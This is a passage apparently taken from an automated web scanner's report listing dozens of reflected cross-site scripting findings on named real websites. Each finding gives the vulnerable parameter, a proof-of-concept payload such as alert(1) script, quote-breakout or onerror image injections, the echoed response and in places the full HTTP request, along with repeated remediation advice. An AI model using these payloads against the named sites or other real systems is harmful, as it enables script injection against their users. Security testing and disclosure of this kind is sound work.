The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload eed86"%3balert(1)//bce1ca0334318ecc was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as eed86";alert(1)//bce1ca0334318ecc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload cc7b4%3balert(1)//9dcf24fbbae29fe73 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as cc7b4;alert(1)//9dcf24fbbae29fe73 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload d4866%3balert(1)//7adf7fe3a9ec7b8e was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as d4866;alert(1)//7adf7fe3a9ec7b8e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload b513a%3balert(1)//55e54f10d448fe345 was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as b513a;alert(1)//55e54f10d448fe345 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1d989"%3balert(1)//ffb3e0bcf8c8e65a5 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 1d989";alert(1)//ffb3e0bcf8c8e65a5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 65693%3balert(1)//fa7cf0ceb078b98f0 was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as 65693;alert(1)//fa7cf0ceb078b98f0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload dcd60%3balert(1)//0b96acd41133d8c9a was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as dcd60;alert(1)//0b96acd41133d8c9a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.hidden_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 9a417%3balert(1)//9327e05363b was submitted in the PC_7_1_CKB_input.hidden_rf parameter. This input was echoed as 9a417;alert(1)//9327e05363b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_input.peopletravelling request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8f314"%3balert(1)//5a389706e86 was submitted in the PC_7_1_CKB_input.peopletravelling parameter. This input was echoed as 8f314";alert(1)//5a389706e86 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_children request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload f5dea%3balert(1)//19c929529ef was submitted in the PC_7_1_CKB_number_of_children parameter. This input was echoed as f5dea;alert(1)//19c929529ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the PC_7_1_CKB_number_of_rf request parameter is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 5ba8d%3balert(1)//2437f3f8a0d was submitted in the PC_7_1_CKB_number_of_rf parameter. This input was echoed as 5ba8d;alert(1)//2437f3f8a0d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the event request parameter is copied into the HTML document as plain text between tags. The payload cbbc9<script>alert(1)</script>9c8029bf821 was submitted in the event parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Content-Type: text/html; charset=UTF-8 Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET Date: Wed, 31 Aug 2011 21:17:35 GMT Content-Length: 45745
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http: ...[SNIP]... <b>Sorry the page (homecbbc9<script>alert(1)</script>9c8029bf821) you are trying to reach is temporarily unavailable or the page no longer exists.</b> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d was submitted in the REST URL parameter 1. This input was echoed as 96123<img src=a onerror=alert(1)>4d326f7959d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /favicon.ico96123<img%20src%3da%20onerror%3dalert(1)>4d326f7959d HTTP/1.1 Accept: */* Accept-Encoding: gzip User-Agent: Mozilla/5.0 (compatible; Google Desktop/5.9.1005.12335; http://desktop.google.com/) Host: www.northeastassembly.org Proxy-Connection: Keep-Alive
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload d545c<img%20src%3da%20onerror%3dalert(1)>a17ba1d1400 was submitted in the REST URL parameter 1. This input was echoed as d545c<img src=a onerror=alert(1)>a17ba1d1400 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 48c90<img%20src%3da%20onerror%3dalert(1)>8fb9e79cd91 was submitted in the REST URL parameter 2. This input was echoed as 48c90<img src=a onerror=alert(1)>8fb9e79cd91 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload 8aa59<script>alert(1)</script>591ff6210ff was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload 42bea<script>alert(1)</script>49517bc6b was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7173f'%3balert(1)//3a5e4e79bff was submitted in the REST URL parameter 1. This input was echoed as 7173f';alert(1)//3a5e4e79bff in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b563'%3balert(1)//6baa6ca43a7 was submitted in the REST URL parameter 2. This input was echoed as 8b563';alert(1)//6baa6ca43a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 45ad9'%3balert(1)//dca9cdb09d8 was submitted in the REST URL parameter 3. This input was echoed as 45ad9';alert(1)//dca9cdb09d8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e52f7'%3balert(1)//c6fe33d9af8 was submitted in the REST URL parameter 4. This input was echoed as e52f7';alert(1)//c6fe33d9af8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5700b'%3balert(1)//a4618d0f33e was submitted in the REST URL parameter 1. This input was echoed as 5700b';alert(1)//a4618d0f33e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c6e7b'%3balert(1)//3e61a40bc15 was submitted in the REST URL parameter 2. This input was echoed as c6e7b';alert(1)//3e61a40bc15 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3f104'%3balert(1)//a91ae3923d0 was submitted in the REST URL parameter 3. This input was echoed as 3f104';alert(1)//a91ae3923d0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bcd32'%3balert(1)//2ebec79faf0 was submitted in the REST URL parameter 4. This input was echoed as bcd32';alert(1)//2ebec79faf0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cb973'%3balert(1)//5ae776482d2 was submitted in the REST URL parameter 1. This input was echoed as cb973';alert(1)//5ae776482d2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c5e28'%3balert(1)//72640ad8ae9 was submitted in the REST URL parameter 1. This input was echoed as c5e28';alert(1)//72640ad8ae9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 433e7'%3balert(1)//a6ca7c8d8b3 was submitted in the REST URL parameter 2. This input was echoed as 433e7';alert(1)//a6ca7c8d8b3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a7e41'%3balert(1)//2868a32650b was submitted in the REST URL parameter 1. This input was echoed as a7e41';alert(1)//2868a32650b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c808'%3balert(1)//cc626548f60 was submitted in the REST URL parameter 2. This input was echoed as 2c808';alert(1)//cc626548f60 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e722e'%3balert(1)//9a384f26ad1 was submitted in the REST URL parameter 3. This input was echoed as e722e';alert(1)//9a384f26ad1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cf1bb'%3balert(1)//d95411b89d1 was submitted in the REST URL parameter 4. This input was echoed as cf1bb';alert(1)//d95411b89d1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab767'%3balert(1)//079ca41f4fb was submitted in the REST URL parameter 5. This input was echoed as ab767';alert(1)//079ca41f4fb in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38297'%3balert(1)//65f5d667c36 was submitted in the REST URL parameter 6. This input was echoed as 38297';alert(1)//65f5d667c36 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1e1c3'%3balert(1)//e4208c355d3db111b was submitted in the REST URL parameter 1. This input was echoed as 1e1c3';alert(1)//e4208c355d3db111b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the batchId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 65da6'-alert(1)-'f485ca4e6a8f11a8d was submitted in the batchId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u ...[SNIP]... re Are They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html"; dwr.engine._remoteHandleCallback('065da6'-alert(1)-'f485ca4e6a8f11a8d','0',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-id request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload f2701'-alert(1)-'51301dabb52a6555 was submitted in the c0-id parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
//#DWR-INSERT //#DWR-REPLY var s0={};var s1={};var s2={};var s3={};var s4={};var s5={};var s6={};var s7={};var s8={};var s9={};s0.headline="Vile defense against sex harassment lawsuit: She's too u ...[SNIP]... re They Now?";s9.url="http://www.nydailynews.com/entertainment/movies/galleries/beverly_hills_cop_where_are_they_now/beverly_hills_cop_where_are_they_now.html"; dwr.engine._remoteHandleCallback('0','0f2701'-alert(1)-'51301dabb52a6555',[s0,s1,s2,s3,s4,s5,s6,s7,s8,s9]);
The value of the c0-methodName request parameter is copied into the HTML document as plain text between tags. The payload 82732<script>alert(1)</script>c32ba96e3f17ced29 was submitted in the c0-methodName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
The value of the c0-scriptName request parameter is copied into the HTML document as plain text between tags. The payload c04a1<script>alert(1)</script>01f351e2c7684ef21 was submitted in the c0-scriptName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script>alert(1)</script>01f351e2c7684ef21' }, '0'); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'java.lang.SecurityException', message:'No class by name: mostPopularStoriesc04a1<script> ...[SNIP]...
The value of the callCount request parameter is copied into the HTML document as plain text between tags. The payload 64b78<script>alert(1)</script>0327368a54ef65d92 was submitted in the callCount parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
//#DWR-REPLY if (window.dwr) dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78<script>alert(1)</script>0327368a54ef65d92' }); else if (window.parent.dwr) window.parent.dwr.engine._remoteHandleBatchException({ name:'org.directwebremoting.extend.ServerException', message:'The specified call count is not a number: 164b78< ...[SNIP]...
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c1c5'%3balert(1)//7b24542dda8 was submitted in the REST URL parameter 1. This input was echoed as 4c1c5';alert(1)//7b24542dda8 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a0e8f'%3balert(1)//10ffe396caa was submitted in the REST URL parameter 2. This input was echoed as a0e8f';alert(1)//10ffe396caa in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3a909'%3balert(1)//aa28d82e17b was submitted in the REST URL parameter 3. This input was echoed as 3a909';alert(1)//aa28d82e17b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 628cf'%3balert(1)//4f051986422 was submitted in the REST URL parameter 4. This input was echoed as 628cf';alert(1)//4f051986422 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload cfa16'%3balert(1)//613bf33760e was submitted in the REST URL parameter 5. This input was echoed as cfa16';alert(1)//613bf33760e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 6 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 96e84'%3balert(1)//ac257857d1c was submitted in the REST URL parameter 6. This input was echoed as 96e84';alert(1)//ac257857d1c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 7 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 49c8a'%3balert(1)//f3a23f825a9 was submitted in the REST URL parameter 7. This input was echoed as 49c8a';alert(1)//f3a23f825a9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3bf3f'%3balert(1)//71f8b572442 was submitted in the REST URL parameter 1. This input was echoed as 3bf3f';alert(1)//71f8b572442 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 324af'%3balert(1)//48d92f1efda was submitted in the REST URL parameter 2. This input was echoed as 324af';alert(1)//48d92f1efda in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
1.370. http://www.opinionlab.com/content [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.opinionlab.com
Path:
/content
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1cd8a</script><script>alert(1)</script>91c9b453f97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content?1cd8a</script><script>alert(1)</script>91c9b453f97=1 HTTP/1.1 Host: www.opinionlab.com Proxy-Connection: keep-alive Referer: http://www.iab.net/site_map User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName=oPageName s.server=ol_siteURL s.channel="/content/?1cd8a</script><script>alert(1)</script>91c9b453f97=1" // Section name s.campaign="" s.prop1=oPageName // page name s.prop2="5767.4e5faf709594e1.24524238" // WEBID /* Custom variables for custom reporting */ s.eVar1=oPageName s.eVar2="5767.4e5f ...[SNIP]...
1.371. http://www.opinionlab.com/content/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.opinionlab.com
Path:
/content/
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 61856</script><script>alert(1)</script>d1297f41988 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/?61856</script><script>alert(1)</script>d1297f41988=1 HTTP/1.1 Host: www.opinionlab.com Proxy-Connection: keep-alive Referer: http://www.iab.net/site_map User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US"> <head pro ...[SNIP]... <!-- /* You may give each page an identifying name, server, and channel on the next lines. */ s.pageName=oPageName s.server=ol_siteURL s.channel="/content/?61856</script><script>alert(1)</script>d1297f41988=1" // Section name s.campaign="" s.prop1=oPageName // page name s.prop2="5767.4e5faf709594e1.24524238" // WEBID /* Custom variables for custom reporting */ s.eVar1=oPageName s.eVar2="5767.4e5f ...[SNIP]...
1.372. http://www.rbisaleschallenge.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.rbisaleschallenge.com
Path:
/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0eeb"><script>alert(1)</script>02fed4cc8e9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?d0eeb"><script>alert(1)</script>02fed4cc8e9=1 HTTP/1.1 Host: www.rbisaleschallenge.com Proxy-Connection: keep-alive Referer: http://wiki.coldbox.org/wiki/UsingColdBox.cfm User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.218 Safari/535.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
